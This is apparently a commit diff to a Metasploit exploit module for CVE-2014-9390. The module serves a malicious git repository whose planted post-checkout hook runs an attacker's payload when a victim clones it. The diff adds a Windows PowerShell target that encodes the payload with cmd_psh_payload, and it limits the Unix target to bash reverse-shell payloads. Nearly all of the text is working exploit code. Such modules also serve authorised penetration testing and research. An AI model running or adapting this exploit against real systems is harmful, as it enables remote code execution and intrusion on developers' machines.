Merge #4 from @Meatballs2, powershell/other fixes to CVE-2014-9390

2014-12-23 07:50:37 -08:00 · 2014-12-23 07:50:37 -08:00 · 8c0269d40a
parent abec7c206b 16302f752e
commit 8c0269d40a
1 changed files with 31 additions and 14 deletions
--- a/modules/exploits/multi/http/cve_2014_9390.rb
+++ b/modules/exploits/multi/http/cve_2014_9390.rb
@ -9,6 +9,7 @@ class Metasploit4 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpServer
+  include Msf::Exploit::Powershell

  def initialize(info = {})
    super(update_info(
@ -53,24 +54,28 @@ class Metasploit4 < Msf::Exploit::Remote

        ],
      'DisclosureDate' => 'Dec 18 2014',
-      # TODO: correct all of this
-      'Payload'        =>
-        {
-          'Compat'      =>
-            {
-              'PayloadType' => 'cmd',
-              'RequiredCmd' => 'generic perl bash'
-            },
-          'EncoderType'     => Msf::Encoder::Type::Raw
-        },
-      'Platform'	=> %w(osx win),
      'Targets' =>
        [
          [
            'Automatic',
            {
              'Platform' => [ 'unix' ],
-              'Arch'     => ARCH_CMD
+              'Arch'     => ARCH_CMD,
+              'Payload'        =>
+                {
+                  'Compat'      =>
+                    {
+                      'PayloadType' => 'cmd cmd_bash',
+                      'RequiredCmd' => 'generic bash-tcp'
+                    },
+                }
+            }
+          ],
+          [
+            'Windows Powershell',
+            {
+              'Platform' => [ 'windows' ],
+              'Arch'     => [ARCH_X86, ARCH_X86_64]
            }
          ]
        ],
@ -102,6 +107,8 @@ class Metasploit4 < Msf::Exploit::Remote
    end
    setup_git unless git_uri.blank?
    setup_mercurial unless mercurial_uri.blank?
+
+    super
  end

  def setup_git
@ -120,7 +127,17 @@ class Metasploit4 < Msf::Exploit::Remote
    # .git/hooks/post-checkout and will subsequently execute commands of our
    # choosing upon cloning
    # build the hook file blob
+    case target.name
+    when 'Automatic'
      full_cmd = "#!/bin/sh\n#{payload.encoded}\n"
+    when 'Windows Powershell'
+      psh = cmd_psh_payload(payload.encoded,
+                            payload_instance.arch.first,
+                            remove_comspec: true,
+                            encode_final_payload: true)
+      full_cmd = "#!/bin/sh\n#{psh}"
+    end
+
    sha1, content = build_object('blob', full_cmd)
    trigger = "/objects/#{get_path(sha1)}"
    @repo_data[:git][:trigger] = trigger